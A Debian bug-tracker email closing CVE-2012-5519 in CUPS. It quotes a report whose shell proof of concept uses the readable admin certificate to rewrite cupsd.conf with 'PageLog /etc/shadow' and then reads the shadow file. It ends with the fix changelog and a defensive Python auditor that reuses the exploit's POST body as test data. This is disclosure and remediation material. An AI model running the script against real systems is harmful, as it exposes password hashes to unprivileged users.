Your message dated Sat, 12 Jan 2013 15:47:22 +0000
with message-id <[email protected]>
and subject line Bug#692791: fixed in cups 1.4.4-7+squeeze2
has caused the Debian Bug report #692791,
regarding members of lpadmin can read every file on server via cups
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
692791: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: cups
Version: 1.4.4-7+squeeze1
Severity: critical
Tags: security
Justification: root security hole

Members of lpadmin can read /var/run/cups/certs/0. With this key it is possible 
to access the cups web interface as admin. You can edit the cups config file 
and set the page log to any filename you want (for example /etc/shadow). Then 
you can read the file contents by viewing the cups page log. By printing you 
can also write some random data to the given file.

As it is not possible to use the cups authentication with a normal web browser, 
I created a simple shell script to show the effect. When called as any 
unprivileged user who is a member of lpadmin it should display the contents of 
/etc/shadow:


#!/bin/sh
set -e

# backup cupsd.conf, since the POST below replaces it completely
cp /etc/cups/cupsd.conf /tmp

# the local certificate cupsd issues for the admin group; lpadmin can read it
AUTH="Authorization: Local $(cat /var/run/cups/certs/0)"

# POST and GET are the lwp-request aliases from libwww-perl; -d drops the response body.
# The admin CGI compares the org.cups.sid cookie with the form field of the same name,
# so both are sent empty to match. %0A is the newline between the two directives.
POST -d -H "$AUTH" -H "Cookie: org.cups.sid=" http://localhost:631/admin/ <<EOF
OP=config-server&org.cups.sid=&SAVECHANGES=1&CUPSDCONF=Listen localhost:631%0APageLog /etc/shadow
EOF

# cupsd now serves the new "page log", i.e. /etc/shadow
GET http://localhost:631/admin/log/page_log


This bug was detected by one of our customers, Jann Horn.

-- System Information:
Debian Release: 6.0.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages cups depends on:
ii  adduser             3.112+nmu2           add and remove users and groups
ii  bc                  1.06.95-2            The GNU bc arbitrary precision cal
ii  cups-client         1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  cups-common         1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  cups-ppdc           1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  debconf [debconf-2. 1.5.36.1             Debian configuration management sy
ii  ghostscript         8.71~dfsg2-9         The GPL Ghostscript PostScript/PDF
ii  libavahi-client3    0.6.27-2+squeeze1    Avahi client library
ii  libavahi-common3    0.6.27-2+squeeze1    Avahi common library
ii  libc6               2.11.3-4             Embedded GNU C Library: Shared lib
ii  libcups2            1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupscgi1         1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsdriver1      1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsimage2       1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsmime1        1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsppdc1        1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libdbus-1-3         1.2.24-4+squeeze1    simple interprocess messaging syst
ii  libgcc1             1:4.4.5-8            GCC support library
ii  libgnutls26         2.8.6-1+squeeze2     the GNU TLS library - runtime libr
ii  libgssapi-krb5-2    1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries - k
ii  libijs-0.35         0.35-7               IJS raster image transport protoco
ii  libkrb5-3           1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries
ii  libldap-2.4-2       2.4.23-7.2           OpenLDAP libraries
ii  libpam0g            1.1.1-6.1+squeeze1   Pluggable Authentication Modules l
ii  libpaper1           1.1.24               library for handling paper charact
ii  libpoppler5         0.12.4-1.2           PDF rendering library
ii  libslp1             1.2.1-7.8            OpenSLP libraries
ii  libstdc++6          4.4.5-8              The GNU Standard C++ Library v3
ii  libusb-0.1-4        2:0.1.12-16          userspace USB programming library
ii  lsb-base            3.2-23.2squeeze1     Linux Standard Base 3.2 init scrip
ii  poppler-utils       0.12.4-1.2           PDF utilitites (based on libpopple
ii  procps              1:3.2.8-9squeeze1    /proc file system utilities
ii  ssl-cert            1.0.28               simple debconf wrapper for OpenSSL
ii  ttf-freefont        20090104-7           Freefont Serif, Sans and Mono True
ii  zlib1g              1:1.2.3.4.dfsg-3     compression library - runtime

Versions of packages cups recommends:
ii  cups-driver-gutenprint  5.2.6-1          printer drivers for CUPS
ii  foomatic-filters        4.0.5-6+squeeze2 OpenPrinting printer support - fil
ii  ghostscript-cups        8.71~dfsg2-9     The GPL Ghostscript PostScript/PDF

Versions of packages cups suggests:
ii  cups-bsd               1.4.4-7+squeeze1  Common UNIX Printing System(tm) - 
pn  cups-pdf               <none>            (no description available)
ii  foomatic-db            20100630-1        OpenPrinting printer support - dat
pn  hplip                  <none>            (no description available)
ii  smbclient              2:3.6.6-2~bpo60+1 command-line SMB/CIFS clients for 
ii  udev                   164-3             /dev/ and hotplug management daemo
pn  xpdf-korean | xpdf-jap <none>            (no description available)

-- Configuration Files:
/etc/cups/cupsd.conf changed [not included]

-- debconf information excluded

--- End Message ---
--- Begin Message ---
Source: cups
Source-Version: 1.4.4-7+squeeze2

We believe that the bug you reported is fixed in the latest version of
cups, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Didier Raboud <[email protected]> (supplier of updated cups package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 29 Dec 2012 12:33:27 +0100
Source: cups
Binary: libcups2 libcupsimage2 libcupscgi1 libcupsdriver1 libcupsmime1 libcupsppdc1 cups cups-client libcups2-dev libcupsimage2-dev libcupscgi1-dev libcupsdriver1-dev libcupsmime1-dev libcupsppdc1-dev cups-bsd cups-common cups-ppdc cups-dbg cupsddk
Architecture: source all amd64
Version: 1.4.4-7+squeeze2
Distribution: squeeze-security
Urgency: high
Maintainer: Debian CUPS Maintainers <[email protected]>
Changed-By: Didier Raboud <[email protected]>
Description: 
 cups       - Common UNIX Printing System(tm) - server
 cups-bsd   - Common UNIX Printing System(tm) - BSD commands
 cups-client - Common UNIX Printing System(tm) - client programs (SysV)
 cups-common - Common UNIX Printing System(tm) - common files
 cups-dbg   - Common UNIX Printing System(tm) - debugging symbols
 cups-ppdc  - Common UNIX Printing System(tm) - PPD manipulation utilities
 cupsddk    - Common UNIX Printing System (transitional package)
 libcups2   - Common UNIX Printing System(tm) - Core library
 libcups2-dev - Common UNIX Printing System(tm) - Development files CUPS library
 libcupscgi1 - Common UNIX Printing System(tm) - CGI library
 libcupscgi1-dev - Common UNIX Printing System(tm) - Development files for CGI libra
 libcupsdriver1 - Common UNIX Printing System(tm) - Driver library
 libcupsdriver1-dev - Common UNIX Printing System(tm) - Development files driver librar
 libcupsimage2 - Common UNIX Printing System(tm) - Raster image library
 libcupsimage2-dev - Common UNIX Printing System(tm) - Development files CUPS image li
 libcupsmime1 - Common UNIX Printing System(tm) - MIME library
 libcupsmime1-dev - Common UNIX Printing System(tm) - Development files MIME library
 libcupsppdc1 - Common UNIX Printing System(tm) - PPD manipulation library
 libcupsppdc1-dev - Common UNIX Printing System(tm) - Development files PPD library
Closes: 692791
Changes: 
 cups (1.4.4-7+squeeze2) stable-security; urgency=high
 .
   * Backport upstream configuration files split:
     - Add split-configuration-files-STR4223.dpatch
     - Install the new cups-files.conf
     Fixes: CVE-2012-5519 (Closes: #692791)
   * Make cupsd.conf a non-conffile, as it is managed by cups itself.
     - On new installs, set it up from cupsd.conf.default.
     - On upgrades, move it away in preinst and move it back in postinst.
     - On aborted upgrades, move the file back in place.
     - On purge, delete it too.
   * Document changes in cups.NEWS.
Checksums-Sha1: 
 6b922165e26726832978ec4ae2eb406e1f35f3b9 2583 cups_1.4.4-7+squeeze2.dsc
 c6afc5d96747e74b9755d2cce3401638700ced8f 521545 cups_1.4.4-7+squeeze2.diff.gz
 544bc6b73ca305a50a18da18fe96e049e11f448f 1344298 cups-common_1.4.4-7+squeeze2_all.deb
 39d3bc308725571a67343438b94cb64514686b6d 77024 cupsddk_1.4.4-7+squeeze2_all.deb
 d04708b15eacd018ed5dcb50508c77890d05b446 234040 libcups2_1.4.4-7+squeeze2_amd64.deb
 f35568b66006418c793498a786ccb82c79ccaf06 125394 libcupsimage2_1.4.4-7+squeeze2_amd64.deb
 a0537d0648438ddbdbb134264dadb499a6ce1788 105338 libcupscgi1_1.4.4-7+squeeze2_amd64.deb
 2cd2b644b8aadbb237da3701c873f77948d409b3 93916 libcupsdriver1_1.4.4-7+squeeze2_amd64.deb
 5cd392e71dbace2554fc3e21ba4825707be3fd62 87686 libcupsmime1_1.4.4-7+squeeze2_amd64.deb
 51201857fc49b8de27a14e70a273861e2e4ccc92 132420 libcupsppdc1_1.4.4-7+squeeze2_amd64.deb
 ec37d72fdb6123c8b6186570b9390fbff49f5dc3 2059088 cups_1.4.4-7+squeeze2_amd64.deb
 6e7e29037b800da958e09e57909d22c051881c26 139494 cups-client_1.4.4-7+squeeze2_amd64.deb
 8dbd223ae56419ac14e8c7c685ee62375c261185 294934 libcups2-dev_1.4.4-7+squeeze2_amd64.deb
 53072d6018f62e63c09cec272492881488a1c004 61186 libcupsimage2-dev_1.4.4-7+squeeze2_amd64.deb
 ab9eae265141d4533127d1f9ba164e697ca9ae6f 110938 libcupscgi1-dev_1.4.4-7+squeeze2_amd64.deb
 fbe450cb6d17611633c443671cffb0da8a90ba28 96886 libcupsdriver1-dev_1.4.4-7+squeeze2_amd64.deb
 066e39be34daba32ce45597f6d2761768827b62a 88420 libcupsmime1-dev_1.4.4-7+squeeze2_amd64.deb
 575d2e20625d4fba7cf395c2ffc2413011ebc801 149904 libcupsppdc1-dev_1.4.4-7+squeeze2_amd64.deb
 3a59df460e1baebf75ab144cfb98c9e576288601 46532 cups-bsd_1.4.4-7+squeeze2_amd64.deb
 93b7ba14959112306d843230a644e656c91678bd 106586 cups-ppdc_1.4.4-7+squeeze2_amd64.deb
 e996d7ff3d2ed820208b7f5491a97a2447c536b4 97122 cups-dbg_1.4.4-7+squeeze2_amd64.deb
Checksums-Sha256: 
 bd4021ac5f0c673277ed769c11630b7fa8563c4f411b5b80a354f0fc56aea30b 2583 cups_1.4.4-7+squeeze2.dsc
 4dd13c53dc7793221f5fb2ca57f0637de43d99a277e1e5a753362d4be3b00517 521545 cups_1.4.4-7+squeeze2.diff.gz
 9dd540769a216eb644848671e5f59438edf8d560db77db86f0866a8e5ff8616e 1344298 cups-common_1.4.4-7+squeeze2_all.deb
 ba706ae5fff98ba8dbc88f88b87598fc8e77e7175f44b0b52aab4a45d0c36da5 77024 cupsddk_1.4.4-7+squeeze2_all.deb
 6852a1c2460602bb57ccba8d808bd91f1fae038a9228cddb2ad1d7e823b64234 234040 libcups2_1.4.4-7+squeeze2_amd64.deb
 b95fbd4cf16b5451610e52696d3f4da9ce1d1707e021eb2a9663ce560df63ea4 125394 libcupsimage2_1.4.4-7+squeeze2_amd64.deb
 e246eb0d184cb9e409394d1bbccd53f55018ba646b986a138f749849e187580a 105338 libcupscgi1_1.4.4-7+squeeze2_amd64.deb
 61bb064df5977a03519c6f357481581f75beab42dcdfddf362c4ef3255fcdcb0 93916 libcupsdriver1_1.4.4-7+squeeze2_amd64.deb
 ab3b73adcb85fea8d955acbb62e7c718d33e777ff76d10527698e5a349e12fc3 87686 libcupsmime1_1.4.4-7+squeeze2_amd64.deb
 9e91ab36c25fdc89e46ce27bec9793b4c2e86102260301ed8f8b7cc4c46f6841 132420 libcupsppdc1_1.4.4-7+squeeze2_amd64.deb
 378a499c0358b880ca165e420b49976ceea8a20e11c86e7bdbd40cc8b03648e4 2059088 cups_1.4.4-7+squeeze2_amd64.deb
 7ae10eb6984a084048983216475f1b1fd91104171d332526165d750081ab14bd 139494 cups-client_1.4.4-7+squeeze2_amd64.deb
 13a3487740ca366d06d2ddc7f6608646b96b74b2d7f3e19c759eae678ee5077e 294934 libcups2-dev_1.4.4-7+squeeze2_amd64.deb
 2d892b4d8ef6b2f50fe8decf981088695ba770f1db88bdf9d9487aa62c07106c 61186 libcupsimage2-dev_1.4.4-7+squeeze2_amd64.deb
 a2bfa856774f046ff31c41889f7b47f7efd46fb75f101df21dfd7598c0e60b26 110938 libcupscgi1-dev_1.4.4-7+squeeze2_amd64.deb
 1b48cbe741863161551eca74cdc73e2b4705f5a67a2d14c5ce9a915257d8d174 96886 libcupsdriver1-dev_1.4.4-7+squeeze2_amd64.deb
 c5549b011a5e7b7d1e94761b9f3caee366cc183ece80d23f9ff97cec3c54a807 88420 libcupsmime1-dev_1.4.4-7+squeeze2_amd64.deb
 d33a6d26d1697c0485298a2c20ec6c33f1b25017c743e446e2305a3fd3cf4bd5 149904 libcupsppdc1-dev_1.4.4-7+squeeze2_amd64.deb
 8e9d635f603f0c5757ccd65cf4ff2fad6ea6ceadcecc32fc8ada048560c3b43a 46532 cups-bsd_1.4.4-7+squeeze2_amd64.deb
 120ee31ed37383e73f6b570986a54995da197812daff044734293b0fd27f2d49 106586 cups-ppdc_1.4.4-7+squeeze2_amd64.deb
 0f00eb3ddb41ae9c3aa01704d0ec09f892404139e85e0e48abe0535572ce76d6 97122 cups-dbg_1.4.4-7+squeeze2_amd64.deb
Files: 
 81b09faac4dfeb46339f1ad31a8847d0 2583 net optional cups_1.4.4-7+squeeze2.dsc
 2a2894ea965d229e89a2b4e5d34bbcf1 521545 net optional cups_1.4.4-7+squeeze2.diff.gz
 598ebbd39e6267e7f9e3e5859882bf25 1344298 net optional cups-common_1.4.4-7+squeeze2_all.deb
 feb2e8342bfdb4314ccce1b7ee8d7c17 77024 oldlibs extra cupsddk_1.4.4-7+squeeze2_all.deb
 83e4398558baf341f309ffd7dc8b804f 234040 libs optional libcups2_1.4.4-7+squeeze2_amd64.deb
 0aa9a4b39e8e37175260190dbb6abd4f 125394 libs optional libcupsimage2_1.4.4-7+squeeze2_amd64.deb
 3fc0c95452a701519dfb0cfe452e8e57 105338 libs optional libcupscgi1_1.4.4-7+squeeze2_amd64.deb
 a27420bb5c58f54d0dbb377bb5d03cd2 93916 libs optional libcupsdriver1_1.4.4-7+squeeze2_amd64.deb
 f19f88df88bb245ac80559977e51123a 87686 libs optional libcupsmime1_1.4.4-7+squeeze2_amd64.deb
 e8071d13d22a496077b5e8eb04241184 132420 libs optional libcupsppdc1_1.4.4-7+squeeze2_amd64.deb
 ca37d3ff9ba77b72d6f3ed8ca9a8b5c9 2059088 net optional cups_1.4.4-7+squeeze2_amd64.deb
 541219e6b0a7a47493a9a1add3e15625 139494 net optional cups-client_1.4.4-7+squeeze2_amd64.deb
 6ec993d5884c92c0cd5e3781dcc47000 294934 libdevel optional libcups2-dev_1.4.4-7+squeeze2_amd64.deb
 e3a6bfc0c57718804b09c6f91f7e7dcf 61186 libdevel optional libcupsimage2-dev_1.4.4-7+squeeze2_amd64.deb
 48fff9a16a074a498d7059e529dd264d 110938 libdevel optional libcupscgi1-dev_1.4.4-7+squeeze2_amd64.deb
 f28e008377d699a4616ed5b661c6cbac 96886 libdevel optional libcupsdriver1-dev_1.4.4-7+squeeze2_amd64.deb
 4c0cbf5e55946aedb22089e9a8d23886 88420 libdevel optional libcupsmime1-dev_1.4.4-7+squeeze2_amd64.deb
 4d657fbf340928e5f4d6c5cb4ab35bba 149904 libdevel optional libcupsppdc1-dev_1.4.4-7+squeeze2_amd64.deb
 6208ace17e754fbd33ed89215a3b6da7 46532 net extra cups-bsd_1.4.4-7+squeeze2_amd64.deb
 2a4bd6619eb7bccfaa9975e2004dc3d5 106586 net optional cups-ppdc_1.4.4-7+squeeze2_amd64.deb
 0637a0175f63391a7f88945733438d0e 97122 debug extra cups-dbg_1.4.4-7+squeeze2_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
-----END PGP SIGNATURE-----

--- End Message ---
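Added example, not code from the bug report or from the cups package: a small audit in Python that checks a cupsd.conf for the file directives this bug abuses and, given a captured config-server POST like the one in the report's script, shows what the submitted configuration would have done. It covers both the report's technique and the squeeze2 fix, because the directive list it checks against is the set that split-configuration-files-STR4223.dpatch moves out of cupsd.conf into cups-files.conf. That list, the /var/log/cups log location and the /etc/cups ServerRoot default are assumptions taken from the upstream CUPS documentation rather than from this thread, and every configuration and request body in it is constructed for the example.

```python
"""Audit CUPS configuration for the file-path directives behind Debian #692791.

Added example; not code from the bug report or from the cups package. It reads
no live files: every configuration and request body below is constructed.
"""
import posixpath
from urllib.parse import parse_qs

# Assumption: the directives that split-configuration-files-STR4223.dpatch moves
# from cupsd.conf into cups-files.conf, taken from the upstream cups-files.conf
# documentation (CUPS 1.5.4/1.6.2), not from this bug report.
FILE_DIRECTIVES = frozenset({
    "AccessLog", "CacheDir", "ConfigFilePerm", "DataDir", "DocumentRoot",
    "ErrorLog", "FatalErrors", "FileDevice", "FontPath", "Group",
    "LogFilePerm", "PageLog", "Printcap", "PrintcapFormat", "RemoteRoot",
    "RequestRoot", "ServerBin", "ServerCertificate", "ServerKey",
    "ServerRoot", "StateDir", "SystemGroup", "TempDir", "User",
})
_CANONICAL = {d.lower(): d for d in FILE_DIRECTIVES}  # cupsd matches names case-insensitively

LOG_DIRECTIVES = frozenset({"AccessLog", "ErrorLog", "PageLog"})
LOG_KEYWORDS = frozenset({"syslog", "stderr"})        # non-file log targets
SAFE_LOG_DIR = "/var/log/cups"                        # assumption: Debian's log directory
DEFAULT_SERVER_ROOT = "/etc/cups"                     # relative log paths resolve here


def parse_directives(text):
    """Return (name, value) pairs; comments, blank lines and <Section> tags are skipped."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("<"):
            continue
        parts = line.split(None, 1)
        name = _CANONICAL.get(parts[0].lower(), parts[0])
        pairs.append((name, parts[1].strip() if len(parts) > 1 else ""))
    return pairs


def _log_findings(pairs):
    """Flag log directives whose target is a file outside SAFE_LOG_DIR."""
    server_root = DEFAULT_SERVER_ROOT
    for name, value in pairs:
        if name == "ServerRoot" and value:
            server_root = value
    findings = []
    for name, value in pairs:
        if name in LOG_DIRECTIVES and value.lower() not in LOG_KEYWORDS:
            # normalise first so /var/log/cups/../../../etc/shadow is caught too
            path = posixpath.normpath(posixpath.join(server_root, value))
            if not path.startswith(SAFE_LOG_DIR + "/"):
                findings.append(f"{name} points at {path}, outside {SAFE_LOG_DIR}")
    return findings


def audit_cupsd_conf(text):
    """cupsd.conf is what the web interface rewrites: no file directive may live there."""
    pairs = parse_directives(text)
    findings = [f"{name} is a file directive and belongs in cups-files.conf"
                for name, _ in pairs if name in FILE_DIRECTIVES]
    return findings + _log_findings(pairs)


def audit_cups_files_conf(text):
    """cups-files.conf is root-edited only, but its log paths should still stay in place."""
    return _log_findings(parse_directives(text))


def config_from_admin_post(body):
    """Recover the CUPSDCONF text from a captured config-server form post to /admin/.

    Decoded the way the CGI decodes form data: %0A becomes the newline between
    directives. Returns None for any other admin operation.
    """
    form = parse_qs(body, keep_blank_values=True)
    if form.get("OP") != ["config-server"] or "CUPSDCONF" not in form:
        return None
    return form["CUPSDCONF"][0]


# Constructed: the form body the proof-of-concept script in the report posts.
POC_BODY = ("OP=config-server&org.cups.sid=&SAVECHANGES=1"
            "&CUPSDCONF=Listen localhost:631%0APageLog /etc/shadow")

# Constructed: a cupsd.conf after the squeeze2 split, with the logs in cups-files.conf.
SPLIT_CUPSD_CONF = """\
LogLevel warn
Listen localhost:631
Browsing Off
<Location /admin>
  Order allow,deny
</Location>
"""
SPLIT_CUPS_FILES_CONF = "PageLog /var/log/cups/page_log\nErrorLog /var/log/cups/error_log\n"

if __name__ == "__main__":
    submitted = config_from_admin_post(POC_BODY)
    for finding in audit_cupsd_conf(submitted):
        print("submitted config:", finding)
    print("split cupsd.conf:", audit_cupsd_conf(SPLIT_CUPSD_CONF) or "clean")
    print("cups-files.conf:", audit_cups_files_conf(SPLIT_CUPS_FILES_CONF) or "clean")
```

Run against the report's POST body it yields two findings for PageLog (a file directive inside the web-editable file, and a target of /etc/shadow), while the split configurations come back clean. Paths are normalised before the prefix check, so a target such as /var/log/cups/../../../etc/shadow is reported as /etc/shadow rather than slipping past a plain prefix match. To audit a live system, feed it the contents of /etc/cups/cupsd.conf and /etc/cups/cups-files.conf.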